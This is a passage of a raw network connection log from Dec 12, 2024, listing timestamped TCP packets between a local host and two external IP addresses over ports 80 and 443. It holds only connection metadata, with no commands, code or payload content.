Dec 12, 2024 17:33:57.768058062 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768070936 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768080950 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768090963 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768129110 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768138885 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768141985 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.768141985 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.768315077 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.768614054 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768626928 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768636942 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768646955 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768807888 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768817902 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768821955 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.768835068 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768858910 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768868923 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.768878937 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769067049 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769067049 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769084930 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769093037 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769099951 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769107103 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769114971 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769121885 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769238949 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769329071 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769335985 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769335985 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769346952 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769355059 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769517899 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769542933 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769551992 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769560099 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769567013 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769573927 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769606113 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769613028 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769619942 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769628048 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769635916 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769684076 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769710064 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769718885 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769726992 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769747019 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769803047 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769810915 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769818068 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769825935 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769843102 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769843102 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769843102 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769843102 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.769860029 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769866943 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769874096 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.769984007 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770015001 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770015001 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770015001 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770015001 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770039082 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770045996 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770184994 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770306110 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770350933 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770360947 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770368099 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770375013 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770382881 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770411015 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770417929 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770425081 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770432949 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770440102 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770462036 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770469904 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770477057 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770483971 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770512104 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770519972 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770523071 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770531893 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770539045 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770546913 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770561934 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770569086 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770576000 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770584106 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770616055 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770622969 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770695925 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770744085 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770797968 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770806074 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.770864964 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.770864964 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.771034956 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.771034956 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.771034956 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.984683990 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984694004 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984705925 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984719038 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984730959 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984787941 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.984988928 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.984988928 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985017061 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985030890 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985045910 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985055923 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985063076 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985070944 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985078096 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985085011 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985093117 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985100985 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985109091 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985332012 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985332012 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985332012 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985332012 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985456944 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985465050 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985472918 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985491037 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985503912 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985517979 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985531092 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985543966 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985646963 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.985744953 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985753059 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985759974 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985768080 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985774994 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985783100 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985790968 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985797882 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985805988 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985812902 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.985816002 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986012936 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986037016 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986052036 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986066103 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986078978 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986092091 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986105919 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986119986 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986133099 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986146927 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986157894 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986157894 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986170053 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986183882 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986197948 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986206055 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986206055 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986226082 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986299992 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986314058 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986327887 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986377954 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986377954 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986377954 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986573935 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986593962 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986602068 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986609936 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986617088 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986624956 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986633062 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986640930 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986648083 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986655951 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986663103 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986670017 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986676931 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986684084 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986691952 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986699104 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986706018 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986713886 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986716986 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986726999 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986733913 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986742020 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986748934 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986756086 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986763000 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986840963 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986849070 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986856937 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986917973 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986933947 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986933947 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.986933947 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987095118 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987102985 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987106085 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987114906 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987123013 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987129927 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987137079 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987144947 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987152100 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987159014 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987165928 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987173080 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987179995 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987188101 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987195015 CET	80	49710	147.45.44.131	192.168.11.20
Dec 12, 2024 17:33:57.987278938 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987278938 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987278938 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987278938 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987323999 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987323999 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:57.987495899 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:58.032432079 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:58.751889944 CET	49710	80	192.168.11.20	147.45.44.131
Dec 12, 2024 17:33:58.917262077 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:58.917283058 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:33:58.917431116 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:58.919759035 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:58.919765949 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:33:59.162168026 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:33:59.162444115 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:59.165085077 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:59.165092945 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:33:59.165282011 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:33:59.198744059 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:59.198744059 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:33:59.198820114 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.033301115 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.033416986 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.033890963 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.036251068 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.036268950 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.036302090 CET	49711	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.036309004 CET	443	49711	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.113126040 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.113152027 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.113336086 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.113568068 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.113578081 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.352109909 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.352277994 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.353214025 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.353245974 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.353523970 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.354578972 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.354578972 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.354650974 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.936943054 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937012911 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937050104 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937084913 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937150002 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937169075 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.937179089 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937264919 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.937427998 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.937562943 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937613964 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937650919 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937738895 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.937747002 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.937868118 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.937912941 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.938379049 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.938420057 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.938467979 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.938550949 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.938677073 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.938743114 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.938743114 CET	49712	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.938754082 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.938757896 CET	443	49712	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.960088968 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.960122108 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:00.960272074 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.960597992 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:00.960607052 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.197833061 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.198117018 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.199017048 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.199027061 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.199274063 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.201020956 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201309919 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201358080 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.201375008 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201385975 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201441050 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.201602936 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201796055 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.201831102 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.799530983 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.799623966 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.799793005 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.799916029 CET	49713	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.799927950 CET	443	49713	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.812860012 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.812880993 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:01.813038111 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.813237906 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:01.813244104 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.050777912 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.050942898 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.051881075 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.051896095 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.052222967 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.053304911 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.053457022 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.053482056 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.053499937 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.053555012 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.053565025 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.947650909 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.947993040 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.948276043 CET	49714	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.950812101 CET	49714	443	192.168.11.20	172.67.207.38
